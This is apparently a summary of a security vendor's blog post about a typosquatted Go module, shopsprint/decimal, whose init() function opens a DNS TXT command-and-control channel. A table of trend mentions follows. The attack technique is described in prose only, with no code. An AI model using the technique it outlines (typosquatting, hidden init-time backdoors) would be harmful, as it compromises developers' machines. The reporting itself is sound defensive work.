Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor
Blog post from Socket
Socket's Threat Research Team discovered a malicious Go module, github.com/shopsprint/decimal, which is a typosquat of the legitimate github.com/shopspring/decimal library used for arbitrary precision arithmetic in the Go ecosystem. This malicious module was weaponized on August 19, 2023, with version v1.3.3 introducing a harmful init() function that opens a DNS TXT record command-and-control channel to a threat actor's subdomain. Although the GitHub repository and owner account for shopsprint have been removed, the malicious version is still accessible through proxy.golang.org. The attack uses a "trust-then-poison" pattern, where the module appeared benign for years before being weaponized. The malicious code, which can execute arbitrary commands on affected machines, exploits Go's package initialization to run in the background without user-visible output. The persistence of this threat is facilitated by Go's reproducibility model, which caches module artifacts indefinitely. This incident highlights the vulnerabilities in software supply chains, particularly through typosquatting, and underscores the importance of vigilant dependency management and security practices in development environments.
| Trend | Post Mentions | Total Month Mentions | Posts | Companies | MoM |
|---|---|---|---|---|---|
| AI Coding Assistant | 2 | 1,798 | 527 | 167 | +21% |
| MCP | 1 | 7,098 | 726 | 186 | +16% |
| Secrets Management | 1 | 2,152 | 360 | 101 | +18% |